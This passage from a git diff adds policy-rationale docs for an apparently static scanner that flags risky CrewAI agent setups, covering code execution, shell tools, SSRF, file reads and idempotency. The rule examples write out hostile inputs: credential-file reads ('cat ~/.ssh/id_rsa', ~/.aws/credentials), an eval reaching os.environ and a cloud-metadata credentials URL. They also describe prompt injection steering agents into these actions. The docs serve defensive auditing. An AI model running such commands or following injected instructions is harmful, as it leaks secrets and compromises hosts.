severity is medium and not high:** delegation is only dangerous in +proportion to what the reachable peers can do; a crew where no peer holds a +risky tool is exposed to nothing worse than wasted turns, so the impact is +conditional in a way code execution is not. **Fix type — config:** flip the +constructor kwarg. **Confidence 0.75:** the rule cannot see whether any +reachable peer actually holds a dangerous capability, so it over-flags benign +all-read-only crews — the gap that drops it below the code-execution rules. + +--- + +## What this policy does not cover + +- Code execution wired by hand rather than via the flag — an `Agent` whose + `tools=[...]` lists `CodeInterpreterTool` directly is caught by **CREW-103** + (code_execution.md), not here. +- Whether the agent's input is actually reachable by untrusted content. The + rules flag the capability grant, not a proven injection path, so an agent + exercised only on trusted input is a (deliberate) false positive. +- Delegation risk is judged structurally: CREW-104 does not resolve the peer + graph to confirm a dangerous capability is reachable, so it neither suppresses + on a safe crew nor escalates on a dangerous one. +- `Crew`-level execution settings and the `Process` topology (sequential vs. + hierarchical) that influence which agents can delegate are out of scope. + +--- + +## Recommendations beyond the fix + +```python +from crewai import Agent + +# Safe form: no in-process code execution, no open delegation. +researcher = Agent( + role="Researcher", + goal="Summarize the supplied report", + backstory="...", + allow_code_execution=False, # never inject the in-process interpreter + allow_delegation=False, # keep the trust boundary at this agent + tools=[vetted_search_tool], # only the minimum the role needs +) +``` + +1. If code execution is a genuine product requirement, run it **outside CrewAI** + in a hardened external sandbox (E2B, Modal, or an isolated runner with no + filesystem, no network, no credentials, and a hard timeout) and gate every + run behind explicit human approval. +2. If the crew must delegate, keep high-risk tools (code execution, file read, + shell) off every agent reachable through delegation, and constrain each + peer's tool set to the minimum its role requires. +3. Prefer the default `safe` execution mode unconditionally; never set + `code_execution_mode="unsafe"` even in development, where a stray injection + on a developer machine reaches the host directly. +4. Treat retrieved content and prior tool output as untrusted — they are the + model-reachable surface a prompt injection rides in on. diff --git a/docs/Policy/crewai/code_execution.md b/docs/Policy/crewai/code_execution.md new file mode 100644 index 0000000..0259143 --- /dev/null +++ b/docs/Policy/crewai/code_execution.md @@ -0,0 +1,170 @@ +--- +policy_id: crewai_code_execution +category: crewai +topic: code_execution +rules: + - id: CREW-003 + severity: high + confidence: 0.85 + scope: tool + fix_type: code + - id: CREW-103 + severity: high + confidence: 0.85 + scope: agent + fix_type: config +references: [LLM05] +--- + +# Policy Rationale: CrewAI Code-Execution Safety + +**Policy ID:** `crewai_code_execution` +**File:** `crewai/code_execution.yaml` +**Rules:** CREW-003, CREW-103 +**Severities:** high, high +**Fix types:** code, config +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +Two routes to model-selected code execution in CrewAI. **CREW-103** (agent +scope) fires when an `Agent`'s resolved tool set includes `CodeInterpreterTool`, +CrewAI's built-in that runs model-generated Python (predicate +`agent_uses_hosted_tool_class`). **CREW-003** (tool scope) fires when a +`@tool`-decorated CrewAI function's body calls `eval`, `exec`, or `compile` +(predicate `has_code_exec_call`, a bare-builtin AST match — `re.compile` and +other attribute calls do not fire). The two cover the same arbitrary-execution +capability reached two ways: by wiring the built-in, or by hand-rolling it +inside a tool body. + +--- + +## Why dynamic code execution is a distinct concern in CrewAI tools + +In a conventional program, `eval`/`exec` runs a string the developer wrote. In +a model-callable tool, the model writes or steers the string. With any +model-influenced input, dynamic evaluation is arbitrary code execution inside +the agent process — no OS sandbox stands between the call and the runtime's +imports, file handles, and in-memory credentials. The blast radius is the whole +process: a single evaluated string can reach `os.environ` for API keys, read or +write any file the process can touch, or spawn a subprocess. + +The CrewAI-specific sharpening is that this is the same capability behind +CrewAI's own published advisories. `CodeInterpreterTool` is the built-in form; +the CERT remediation for CVE-2026-2275 (SandboxPython `ctypes` escape) and +CVE-2026-2287 (Docker-availability fallback to host execution) is literally to +remove or disable the Code Interpreter Tool. Hand-rolling `eval`/`exec` inside a +`@tool` body (CREW-003) carries the identical risk while bypassing whatever +sandboxing the built-in would have applied — it is the built-in's danger with +none of its mitigations, hidden inside an ordinary-looking tool. + +--- + +## Rule-by-rule defense + +### CREW-003 — Tool body evaluates dynamic code (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a CrewAI `@tool`-decorated function whose body calls the +bare `eval`, `exec`, or `compile` builtin (predicate `has_code_exec_call`, an +AST callee match, not a substring scan). + +**Why it is flaggable:** dynamic evaluation in a model-callable tool is an +arbitrary-code-execution surface whenever any part of the evaluated string +originates with the model. The presence of the primitive is the signal. + +**Real-world consequence:** a `calculate(expr)` tool implemented as +`return eval(expr)` is driven by an injected instruction into +`__import__('os').environ` to read secrets, or into reading/writing files the +process can touch. + +**Why severity is high and not critical:** no in-band sandbox stands between the +call and the full runtime, so the only reliable fix is removing dynamic +evaluation; it is not raised to critical because the engine reserves that tier +and because the exposure depends on whether the evaluated string is actually +model-influenced. **Fix type — code:** removing `eval`/`exec`/`compile` is an +edit to the tool's own source. **Confidence 0.85:** the bare-callee match avoids +the `re.compile` false positive, but a dynamic-eval helper in another module, or +evaluation via `types.FunctionType` / `marshal` / `pickle.loads`, escapes the +body-only walk. + +### CREW-103 — Agent wires the code-interpreter built-in tool (Severity: high, Confidence: 0.85, Fix type: config) + +**What we detect:** an `Agent` whose resolved tool set includes +`CodeInterpreterTool` (predicate `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** `CodeInterpreterTool` executes model-generated Python. +Once it is in the tool set, a prompt injection or a confused model can run +attacker-chosen code in the agent process — the same capability +`allow_code_execution=True` auto-injects (CREW-101), reached here by wiring the +tool by hand. It is the documented vector behind CVE-2026-2275 and +CVE-2026-2287. + +**Real-world consequence:** an agent's `tools=[search, CodeInterpreterTool()]` +gives a prompt-injected model a direct interpreter; the injection runs arbitrary +Python with the agent's privileges, escaping the sandbox via the ctypes path of +CVE-2026-2275 when the SandboxPython interpreter is in use. + +**Why severity is high and not critical:** identical calibration to CREW-101 — +execution passes through CrewAI's sandbox by default, so a successful attack +needs a sandbox escape or the Docker-unavailable host fallback rather than +landing on the host unconditionally. **Fix type — config:** the fix is removing +the tool from the agent's `tools=[...]`, an agent-wiring change, not a tool +source edit. **Confidence 0.85:** the class-name match cannot see whether a team +has wrapped the interpreter in an out-of-band sandbox, so a few legitimately +hardened uses are over-flagged. + +--- + +## What this policy does not cover + +- `allow_code_execution=True` and `code_execution_mode="unsafe"` — the + constructor-flag routes to the same interpreter are caught by **CREW-101 / + CREW-102** (agent_safety.md), not here. +- For CREW-003: dynamic evaluation reached through a helper in another module + (the walk sees only the tool body), and alternative dynamic-code primitives + (`types.FunctionType`, `marshal.loads`, `pickle.loads`, `importlib`-driven + loading). Evaluations whose argument is provably a constant literal still fire + — the predicate flags the presence of the primitive, not proof of + model-control. +- For CREW-103: a custom subclass of `CodeInterpreterTool` under a different + class name, or a third-party interpreter tool, is not in the matched class + set. Whether the interpreter is sandboxed out of band is not visible to the + class-name match. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool +import ast + +# Replace `eval(expr)` with a constrained evaluator that runs no code. +@tool("calculate") +def calculate(expr: str) -> str: + """Evaluate a constant arithmetic expression and return the result. + Rejects anything that is not a literal/operator tree.""" + try: + node = ast.parse(expr, mode="eval") + except SyntaxError: + return "error: not a valid expression" + allowed = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Num, + ast.Constant, ast.operator, ast.unaryop) + if not all(isinstance(n, allowed) for n in ast.walk(node)): + return "error: expression contains disallowed syntax" + return str(eval(compile(node, "", "eval"))) # safe: literals only +``` + +1. Remove `CodeInterpreterTool` from production agents. If code execution is a + genuine requirement, run it **outside CrewAI** in a hardened external sandbox + (no filesystem, no network, no credentials, hard timeout) and gate it behind + explicit human approval. +2. For data math, prefer `ast.literal_eval` (data only, no calls) over any + evaluator; reserve a constrained AST walk for the rare arithmetic case. +3. Keep application secrets out of the process that hosts any + evaluation-capable tool — assume an evaluated string can read the whole + environment. +4. Log every interpreter invocation with the session ID and the model that + requested it, so an incident can be reconstructed. diff --git a/docs/Policy/crewai/dangerous_tools.md b/docs/Policy/crewai/dangerous_tools.md new file mode 100644 index 0000000..6ed7ad0 --- /dev/null +++ b/docs/Policy/crewai/dangerous_tools.md @@ -0,0 +1,160 @@ +--- +policy_id: crewai_dangerous_tools +category: crewai +topic: dangerous_tools +rules: + - id: CREW-106 + severity: high + confidence: 0.7 + scope: agent + fix_type: config + - id: CREW-107 + severity: medium + confidence: 0.7 + scope: agent + fix_type: config +references: [LLM02, LLM06] +--- + +# Policy Rationale: CrewAI Dangerous Built-in Tools + +**Policy ID:** `crewai_dangerous_tools` +**File:** `crewai/dangerous_tools.yaml` +**Rules:** CREW-106, CREW-107 +**Severities:** high, medium +**Fix types:** config, config +**References:** LLM02 (Sensitive Information Disclosure), LLM06 (Excessive Agency) + +--- + +## What this policy covers + +Agent-scope rules for two classes of high-risk `crewai_tools` built-ins wired +onto an `Agent`. **CREW-106** fires when the agent wires `FileReadTool` with no +`file_path=` pin (predicate: `agent_uses_hosted_tool_class` for `FileReadTool` +AND `not agent_hosted_tool_kwarg_present` for its `file_path` kwarg). **CREW-107** +fires when the agent wires any of the web-fetching / RAG built-ins that retrieve +a model-chosen URL — `ScrapeWebsiteTool`, `SeleniumScrapingTool`, +`WebsiteSearchTool`, `SerperDevTool`, `JSONSearchTool`, `PDFSearchTool`, or +`CSVSearchTool` (predicate `agent_uses_hosted_tool_class`). Both read the +agent's resolved tool edges, not any tool body. + +--- + +## Why model-controlled file and URL targets are a distinct concern in CrewAI + +Both rules describe the same failure: a built-in tool whose *target* is chosen +by the model at call time, on an agent whose prompt surface is model-reachable. +An unpinned `FileReadTool` reads whatever path the model names — so a prompt +injection can make it read `/etc/passwd`, `~/.ssh/id_rsa`, or the application's +secrets file. That arbitrary-file-read exposure is exactly what CVE-2026-2285 +(path traversal in the file-read tool) describes. Pinning the tool to a specific +file at construction removes the model's control over the target, which is why +`FileReadTool(file_path="...")` is the safe form and does not fire. + +The web-fetching built-ins (CREW-107) are a server-side request forgery surface. +Because the destination is model-controlled, a prompt injection can point a +scraper or RAG retriever at internal services or the cloud metadata endpoint +(169.254.169.254) to exfiltrate credentials — the exposure tracked as +CVE-2026-2286. There is a second-order channel too: the retrieved page content +re-enters the conversation as untrusted text, giving the fetched site its own +prompt-injection path into the agent. So the tool is both an outbound SSRF +primitive and an inbound injection vector in one. + +--- + +## Rule-by-rule defense + +### CREW-106 — Agent grants an unconstrained FileReadTool (Severity: high, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent` that wires `FileReadTool` without a `file_path=` +argument (predicates `agent_uses_hosted_tool_class` + `not +agent_hosted_tool_kwarg_present`). + +**Why it is flaggable:** with no pinned path the tool reads any file the agent +process can see, at a path the model chooses — arbitrary file read on the model's +say-so, the CVE-2026-2285 exposure. + +**Real-world consequence:** an agent given `FileReadTool()` to "read the project +README" is injected to read `~/.aws/credentials`; the contents flow back into the +model context and out to the caller. + +**Why severity is high and not critical:** arbitrary file read is serious but is +read-only and bounded by the process's filesystem permissions; it is not the +unconditional code execution the engine reserves critical for. **Fix type — +config:** the fix is constructing the tool with a pinned `file_path=`, an +agent-wiring change. **Confidence 0.7:** the rule cannot tell whether the agent's +input is reachable by untrusted content, and an agent that legitimately needs to +read several validated paths (and does its own allow-listing) is over-flagged — +the gap that holds it at 0.7. + +### CREW-107 — Agent wires a tool that fetches model-chosen URLs (Severity: medium, Confidence: 0.7, Fix type: config) + +**What we detect:** an `Agent` that wires one of the listed scraper / search / +RAG built-ins (predicate `agent_uses_hosted_tool_class`). + +**Why it is flaggable:** these tools issue outbound requests to a model-supplied +URL, an SSRF primitive (CVE-2026-2286), and feed the retrieved content back into +the conversation as untrusted text. + +**Real-world consequence:** an agent with `ScrapeWebsiteTool()` is injected to +fetch `http://169.254.169.254/latest/meta-data/iam/security-credentials/`, and +the returned cloud credentials are exfiltrated through the model's next output. + +**Why severity is medium and not high:** the impact depends on the network the +agent host sits in — an agent with no reachable internal services or metadata +endpoint, or behind an egress proxy, gets a much smaller blast radius than the +unconstrained file read of CREW-106, so the capability is flagged at medium. +**Fix type — config:** drop or constrain the tool at the agent, plus egress +controls — no tool source edit. **Confidence 0.7:** the rule flags the tool's +presence, not a proven reachable internal target, so it over-flags agents that +only ever fetch vetted external URLs or run behind a strict egress allow-list. + +--- + +## What this policy does not cover + +- A *pinned* `FileReadTool(file_path="...")` does not fire (by design) — but the + rule does not verify that the pinned path is itself safe or non-sensitive. +- File read or URL fetch implemented by hand inside a `@tool` body rather than + via these built-ins. Hand-rolled SSRF is caught by **CREW-005** (ssrf.md); + there is no tool-scope CrewAI rule for hand-rolled arbitrary file read, so a + custom file-reading tool body is a coverage gap. +- A custom subclass of any of these built-ins under a different class name, or a + third-party scraper/RAG tool not in the listed set, is not matched. +- Whether the agent's prompt surface is actually reachable by untrusted input — + both rules flag the capability grant, not a proven injection path. +- Egress and filesystem controls applied at the OS/container layer are invisible + to the class-name match, so an agent that is in fact sandboxed still fires. + +--- + +## Recommendations beyond the fix + +```python +from crewai import Agent +from crewai_tools import FileReadTool + +# Pin the file reader to the one file the agent needs; the model cannot +# redirect it. For web access, prefer a fixed-endpoint tool over an open scraper. +agent = Agent( + role="Release notes writer", + goal="Draft notes from the changelog", + backstory="...", + tools=[FileReadTool(file_path="docs/CHANGELOG.md")], # pinned target +) +``` + +1. Construct `FileReadTool(file_path="...")` bound to the one file the agent + needs. If it must read several files, validate every candidate against an + allow-list of directories, resolve symlinks, and reject any path that escapes + the intended root (`Path(p).resolve().is_relative_to(root)` — never string + prefix matching). +2. For URL-fetching tools, validate every destination against an allow-list of + hosts, reject private and link-local IP ranges (and redirects into them), and + forbid raw model-supplied URLs. Put an egress proxy in front of the agent + process that blocks the metadata endpoint and internal CIDRs. +3. Treat any retrieved page content as untrusted input — keep it out of the + system prompt and do not let it silently expand the agent's tool permissions. +4. Prefer a purpose-built tool that fetches from a fixed, vetted set of + endpoints over an open scraper or RAG retriever. diff --git a/docs/Policy/crewai/idempotency.md b/docs/Policy/crewai/idempotency.md new file mode 100644 index 0000000..3083ea0 --- /dev/null +++ b/docs/Policy/crewai/idempotency.md @@ -0,0 +1,126 @@ +--- +policy_id: crewai_idempotency +category: crewai +topic: idempotency +rules: + - id: CREW-006 + severity: medium + confidence: 0.55 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: CrewAI Mutating-Tool Idempotency + +**Policy ID:** `crewai_idempotency` +**File:** `crewai/idempotency.yaml` +**Rules:** CREW-006 +**Severities:** medium +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +CrewAI tools whose name implies a side effect but which take no idempotency key. +**CREW-006** fires when a `@tool` function's name starts with one of `create_`, +`send_`, `delete_`, `post_`, `update_`, `refund_`, `charge_`, `issue_` +(predicate `name_has_prefix`) AND no parameter name contains `idempot` or is +exactly `request_id` / `txn_id` (predicate `param_name_matches`, negated). It is +a name-and-signature heuristic — it does not read the tool body. + +--- + +## Why missing idempotency is a distinct concern in CrewAI tools + +A mutating tool that runs twice does its side effect twice: a duplicate charge, a +double-sent message, a repeated delete. In ordinary code a developer controls how +often a function is called; in an agent the *framework* re-invokes tools. CrewAI +retries tool calls under timeouts and ambiguous failures, and the agent loop can +re-select the same tool across turns — so the same side-effecting action can fire +more than once without the author writing any retry logic. The classic trigger is +a timeout: the backend processed the request but the response was lost, so from +the agent's side the call "failed" and is retried, and the action happens again. + +An idempotency key closes this: the tool sends a stable key the backend uses to +recognize a retried request and return the original result instead of +re-executing. Without it, the agent's own retry behavior turns a transient +network blip into a duplicated real-world effect. This is an excessive-agency +(LLM06) reliability hazard — the agent can take a consequential action more times +than intended. The protection only holds end to end if the downstream service +also honors the key; the parameter is necessary but not sufficient on its own. + +--- + +## Rule-by-rule defense + +### CREW-006 — Mutating tool has no idempotency key (Severity: medium, Confidence: 0.55, Fix type: code) + +**What we detect:** a `@tool` whose name begins with a mutation prefix +(`create_`, `send_`, `refund_`, …) and which has no parameter named for an +idempotency key (`*idempot*`, `request_id`, or `txn_id`). + +**Why it is flaggable:** the name signals a side effect, and CrewAI's retry and +re-selection behavior can fire that side effect twice; without a key there is no +mechanism for the backend to deduplicate. + +**Real-world consequence:** a `charge_card(customer, amount)` tool times out +after the charge succeeds; CrewAI retries, and the customer is charged twice with +no key for the payment processor to collapse the duplicate. + +**Why severity is medium and not high:** the duplicate fires only on a retry path +(timeout or ambiguous failure), not on every call, and many backends are already +idempotent for other reasons — so the impact is real but probabilistic rather +than guaranteed. **Fix type — code:** adding an `idempotency_key` parameter and +threading it to the API is a tool-source change. **Confidence 0.55:** this is a +name heuristic, so a tool named `update_cache` that mutates nothing fires (false +positive), a side-effecting tool named `process_payment` without a mutation +prefix does not (false negative), and a tool that achieves idempotency through an +unnamed mechanism (a natural key in the body) is over-flagged — the low number +reflects all three gaps. + +--- + +## What this policy does not cover + +- Side-effecting tools whose name does not start with a listed prefix + (`process_`, `apply_`, `submit_`, `transfer_`) — they are false negatives. +- Tools that achieve idempotency without a matching parameter name — e.g. by + deriving a natural key inside the body, or because the backend dedupes on a + business field. The signature heuristic cannot see body logic, so these fire + anyway. +- Read-only tools that happen to match a prefix (`update_view_count` that only + reads) — a false positive. +- Whether the downstream service actually honors the key. The rule checks for a + parameter, not that retries are truly deduplicated end to end. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool + +@tool("charge_card") +def charge_card(customer_id: str, amount_cents: int, idempotency_key: str) -> str: + """Charge a customer. `idempotency_key` must be stable across retries so a + re-sent request is collapsed by the processor instead of charging twice.""" + return payments.charge( + customer=customer_id, + amount=amount_cents, + idempotency_key=idempotency_key, # backend dedupes on this + ) +``` + +1. Add an `idempotency_key: str` parameter to every mutating tool and pass it + through to the backing API so a retried call is recognized and deduplicated. +2. Make the key stable for a logical operation — derive it from the operation's + inputs (e.g. a hash of customer + amount + intent) so the same retried action + reuses the same key. +3. Confirm the downstream service honors the key; an idempotency parameter the + backend ignores gives no protection. +4. Where the backend cannot dedupe, guard at the application layer (a + processed-operations table keyed by the idempotency key) before performing the + side effect. diff --git a/docs/Policy/crewai/repo_hygiene.md b/docs/Policy/crewai/repo_hygiene.md new file mode 100644 index 0000000..8c869fc --- /dev/null +++ b/docs/Policy/crewai/repo_hygiene.md @@ -0,0 +1,121 @@ +--- +policy_id: crewai_repo_hygiene +category: crewai +topic: repo_hygiene +rules: + - id: CREW-201 + severity: low + confidence: 0.9 + scope: repo + fix_type: config +references: [LLM06] +--- + +# Policy Rationale: CrewAI Repo Hygiene + +**Policy ID:** `crewai_repo_hygiene` +**File:** `crewai/repo_hygiene.yaml` +**Rules:** CREW-201 +**Severities:** low +**Fix types:** config +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +A single repo-scope rule that fires once per scan. **CREW-201** fires when the +repo uses CrewAI in code (predicate `repo_has_sdk_in_code` for `crewai`) but ships +no agent-guidance doc — neither `AGENTS.md` nor `CLAUDE.md` is present as a +discovered repo component (predicate `repo_component_present`, negated). It reads +the scan inventory, not any single file. + +--- + +## Why a missing agent-guidance doc is a distinct concern for CrewAI projects + +`AGENTS.md` is the cross-vendor convention an editing coding agent reads before it +acts on a repository. When neither it nor a `CLAUDE.md` is present, any agent that +opens this repo has no project-specific guidance on how its agents and tools must +be configured. For a CrewAI project specifically, that means nothing in-tree tells +the agent whether `allow_code_execution` or the `CodeInterpreterTool` are +permitted, how tools must be defined and guarded, whether delegation is allowed, +and what the local test and build commands are. The likely consequence is +generated code that violates the project's own safety contract — an agent +re-introducing `allow_code_execution=True` or a hand-rolled `subprocess` tool +because nothing taught it the local rules. This is a soft, preventive form of +excessive-agency risk (LLM06): the guardrail that should constrain an editing +agent's choices is simply absent, so the agent operates with more latitude than +the maintainers intend. + +--- + +## Rule-by-rule defense + +### CREW-201 — Project ships no agent-guidance doc (Severity: low, Confidence: 0.9, Fix type: config) + +**What we detect:** a repo that uses CrewAI in code but has neither `AGENTS.md` +nor `CLAUDE.md` at the root (predicates `repo_has_sdk_in_code` + `not +repo_component_present`). + +**Why it is flaggable:** without an in-tree guidance doc, an editing agent has no +project-specific rules to follow and will reproduce unsafe patterns the +maintainers would reject. + +**Real-world consequence:** a developer asks a coding agent to "add a tool that +runs the build"; with no `AGENTS.md` stating that shell-running tools are +forbidden, the agent writes a `subprocess.run(..., shell=True)` tool and wires it +to a code-executing agent — exactly the patterns the other CrewAI rules flag. + +**Why severity is low and not medium:** the absence of the doc causes no harm by +itself; it only raises the probability that *other* defects get introduced, so it +is a preventive nudge rather than a live vulnerability. **Fix type — config:** +the fix is adding a documentation file at the repo root — no application or tool +code changes. **Confidence 0.9:** presence of `AGENTS.md` / `CLAUDE.md` is an +unambiguous inventory check; the small gap covers projects that document agent +guidance somewhere the component scan does not recognize (a wiki, a nested doc). + +--- + +## What this policy does not cover + +- The *content* or *quality* of an `AGENTS.md`. An empty or stale file satisfies + the rule; the rule checks presence, not whether the guidance is correct or + followed. +- Guidance kept somewhere other than a root `AGENTS.md` / `CLAUDE.md` — a wiki, a + `CONTRIBUTING.md`, or a nested per-package doc the component scan does not map + to these names — counts as absent. +- Whether any agent actually reads the doc. The rule cannot verify that an + editing agent honors the guidance. +- It is a repo-scope nudge, not a per-agent or per-tool check — it says nothing + about the safety of any individual agent or tool in the repo. + +--- + +## Recommendations beyond the fix + +```markdown + +# Agent guidance + +## Safety rules +- Code execution is **forbidden**: never set `allow_code_execution=True` or wire + `CodeInterpreterTool`. Run code only in the external sandbox at `tools/sandbox`. +- Tools must not shell out (`subprocess`, `os.system`) and must not fetch + model-supplied URLs without the allow-list in `net/guard.py`. +- Every mutating tool takes an `idempotency_key`. + +## Commands +- Test: `pytest` +- Lint: `ruff check .` +- Build: `make build` +``` + +1. Add an `AGENTS.md` at the repo root (a `CLAUDE.md` also satisfies the rule). +2. State whether code execution is permitted and under what guard, how tools must + be defined and constrained, and any required human-in-the-loop gates. +3. List the exact test, lint, and build commands so an editing agent can verify + its own changes. +4. Keep it short and concrete so an editing agent can act on it without + re-deriving the conventions — and keep it current as the safety contract + evolves. diff --git a/docs/Policy/crewai/shell_safety.md b/docs/Policy/crewai/shell_safety.md new file mode 100644 index 0000000..154c085 --- /dev/null +++ b/docs/Policy/crewai/shell_safety.md @@ -0,0 +1,125 @@ +--- +policy_id: crewai_shell_safety +category: crewai +topic: shell_safety +rules: + - id: CREW-004 + severity: high + confidence: 0.85 + scope: tool + fix_type: code +references: [LLM05] +--- + +# Policy Rationale: CrewAI Shell-Execution Safety + +**Policy ID:** `crewai_shell_safety` +**File:** `crewai/shell_safety.yaml` +**Rules:** CREW-004 +**Severities:** high +**Fix types:** code +**References:** LLM05 (Improper Output Handling) + +--- + +## What this policy covers + +CrewAI `@tool`-decorated function bodies that spawn an OS process. The detection +is the structured `has_shell_call` predicate: it walks the function's AST and +fires on any call whose resolved callee is `os.system`, `os.popen`, a +`subprocess.*` member (`subprocess.run`, `.Popen`, `.call`, `.check_output`, +`.check_call`, …), or an `os.spawn*` member. Because it matches the resolved +callee rather than raw text, a `subprocess.run(` mentioned in a comment or +docstring does not fire. + +--- + +## Why shell execution is a distinct concern in CrewAI tools + +In a conventional program a subprocess call has a fixed callsite the developer +wrote; the only variability is parameter substitution they approved. In a +model-callable CrewAI tool the model writes or selects the command, and the SDK +imposes no enforcement — the model can return strings that bend the surrounding +command structure, and the tool faithfully runs whatever it builds. Shell +execution selected by model output is the most direct path from prompt injection +to remote code execution. + +The blast radius is the entire process: the subprocess inherits the agent's +working directory, environment variables (including API keys), filesystem +credentials, and outbound network access. The CrewAI-specific sharpening is that +CrewAI ships **no** built-in shell-tool class, so unlike frameworks with a +first-class `ShellTool`, a tool that shells out by hand is the *only* shell +surface in a CrewAI project — and it hides inside an ordinary-looking `@tool`. +That makes the hand-rolled `subprocess.run(cmd, shell=True)` the exact shape a +reviewer must hunt for, because nothing else in the framework will flag it. + +--- + +## Rule-by-rule defense + +### CREW-004 — Tool body spawns a subprocess (Severity: high, Confidence: 0.85, Fix type: code) + +**What we detect:** a CrewAI `@tool`-decorated function whose body invokes +`os.system`, `os.popen`, a `subprocess.*` function, or an `os.spawn*` function +(predicate `has_shell_call`, an AST callee walk, not a substring scan). + +**Why it is flaggable:** process spawn from a model-callable tool puts the OS +shell on the model's tool surface. The presence of the spawn is the signal; +every safeguard is bolted onto an inherently broad primitive. + +**Real-world consequence:** a `run(cmd)` tool forwarding a model string into +`subprocess.run(cmd, shell=True)` is one prompt injection from arbitrary command +execution with the agent's privileges — e.g. an injected +`cmd="cat ~/.ssh/id_rsa"` leaks the private key into the model context. + +**Why severity is high and not critical:** the fix usually means removing the +spawn or rearchitecting behind a typed API; it is not raised above high because +the exposure depends on what the caller does with the spawn, and the engine +reserves critical for unconditional RCE. **Fix type — code:** replacing the +spawn (or fronting it with an allow-list) is a tool-source edit. **Confidence +0.85:** the `subprocess.*` prefix over-fires on the rare non-spawning helper +(`subprocess.list2cmdline`), and async/`pty` spawn primitives escape the body +walk. + +--- + +## What this policy does not cover + +- `asyncio.create_subprocess_exec` / `asyncio.create_subprocess_shell`, + `pty.spawn`, `pexpect.spawn`, `multiprocessing.Process`, and the `os.exec*` + family — none are in the matched callee set. +- A spawn wrapped behind a helper defined in another module — the rule scans the + tool body only. +- Whether the spawned command is safe. A literal `subprocess.run(["ls", "/tmp"], + shell=False)` fires even though it is comparatively benign — the predicate + flags the presence of the primitive, not proof of model-control. +- File-system writes, env-var exfiltration, and network exfiltration through + *non-subprocess* primitives belong to other policies. + +--- + +## Recommendations beyond the fix + +```python +from crewai.tools import tool +import shutil + +# Replace `subprocess.run("du -sh " + path, shell=True)` with a typed API. +@tool("disk_usage") +def disk_usage(path: str) -> str: + """Return free/used disk space for the volume containing `path`.""" + usage = shutil.disk_usage(path) + return f"total={usage.total} used={usage.used} free={usage.free}" +``` + +1. Replace shell-outs with a typed library call wherever one exists + (`shutil`, `pathlib`, an SDK client) rather than shelling to a CLI. +2. If a subprocess is genuinely unavoidable, build the argv list explicitly and + pass `shell=False`; never interpolate model strings into a `shell=True` + command. Allow-list the exact commands permitted. +3. Always pass `timeout=` — a model can request an infinitely-running command. +4. Run the agent in a sandbox container with a read-only root filesystem, + dropped capabilities, and a network egress allow-list; drop sensitive env + vars from the subprocess (`env={...}` with only what the command needs). +5. Keep shell logic out of any agent-callable tool, and log every spawned + command with the session ID for audit. diff --git a/docs/Policy/crewai/ssrf.md b/docs/Policy/crewai/ssrf.md new file mode 100644 index 0000000..5be38b1 --- /dev/null +++ b/docs/Policy/crewai/ssrf.md @@ -0,0 +1,136 @@ +--- +policy_id: crewai_ssrf +category: crewai +topic: ssrf +rules: + - id: CREW-005 + severity: high + confidence: 0.8 + scope: tool + fix_type: code +references: [LLM06] +--- + +# Policy Rationale: CrewAI SSRF Safety + +**Policy ID:** `crewai_ssrf` +**File:** `crewai/ssrf.yaml` +**Rules:** CREW-005 +**Severities:** high +**Fix types:** code +**References:** LLM06 (Excessive Agency) + +--- + +## What this policy covers + +CrewAI `@tool`-decorated function bodies that issue an outbound HTTP request to a +non-literal URL. The detection is the `has_dynamic_url_call` predicate: a request +call (`requests.*`, `httpx.*`, `urllib`, an aiohttp session, …) whose URL +argument is built from a parameter, an f-string, or a concatenation rather than a +fixed string literal. A request to a hard-coded constant URL does not fire. + +This rule covers SSRF reached by *hand-rolled* fetches inside a tool body. The +model-chosen URLs of CrewAI's built-in scraper / RAG tools are a separate +agent-scope concern (CREW-107, dangerous_tools.md). + +--- + +## Why SSRF is a distinct concern in CrewAI tools + +When the request URL is a literal, the developer chose the destination. When it +is built from a tool argument, the *model* chooses the destination at call time — +and in a CrewAI agent the model's choices are reachable by prompt injection. A +server-side request originates from inside the agent's network, so it can reach +things an external caller cannot: internal services on private CIDRs, localhost +admin ports, and the cloud metadata endpoint (169.254.169.254) that hands out +short-lived IAM credentials. A single injected instruction that redirects the +fetch to the metadata endpoint exfiltrates those credentials through the model's +next output. + +There is a second-order hazard specific to agents: whatever the tool fetches +re-enters the conversation as text the model reads, so an attacker who controls +the fetched page controls a fresh prompt-injection channel into the agent. The +SSRF primitive is therefore both an outbound credential-theft path and an inbound +injection path at once — which is why a model-controlled request target is +excessive agency (LLM06) even when the developer never intended the tool to reach +internal hosts. + +--- + +## Rule-by-rule defense + +### CREW-005 — Tool fetches a caller-controlled URL (Severity: high, Confidence: 0.8, Fix type: code) + +**What we detect:** a CrewAI `@tool` body that issues an HTTP request whose URL +is non-literal — built from a parameter or interpolated value (predicate +`has_dynamic_url_call`). + +**Why it is flaggable:** a model-controlled request target lets a prompt +injection point the request at internal services or the metadata endpoint, and +feeds the response back into the conversation as untrusted text. + +**Real-world consequence:** a `fetch_url(url)` tool calling `requests.get(url)` is +injected with `url="http://169.254.169.254/latest/meta-data/iam/security-credentials/role"`; +the returned credentials are exfiltrated through the model's next reply. + +**Why severity is high and not critical:** SSRF is serious but its blast radius +depends on the host's network position (a host with no reachable internal +services or metadata endpoint gets far less); it is not the unconditional code +execution the engine reserves critical for. **Fix type — code:** constraining or +hard-coding the destination is an edit to the tool body. **Confidence 0.8:** the +predicate flags a non-literal URL, so it over-fires when the dynamic part is +already validated against an allow-list inside the body (the rule cannot see the +guard), and it under-fires when the URL is assembled in a helper in another +module. + +--- + +## What this policy does not cover + +- The model-chosen URLs of CrewAI's built-in scraper / search / RAG tools — those + are flagged at agent scope by **CREW-107** (dangerous_tools.md). +- A request whose URL is dynamic but already validated against an allow-list + inside the tool body — the rule cannot see the guard, so it fires anyway (a + known false positive). +- A fetch assembled in a helper in another module — the body-only walk misses it. +- DNS-rebinding and time-of-check/time-of-use attacks against an allow-list that + validates the hostname but not the resolved IP. Defeating those requires + re-checking the resolved address, which is beyond what this rule asserts. +- Exfiltration or internal access through non-HTTP primitives (raw sockets, DNS, 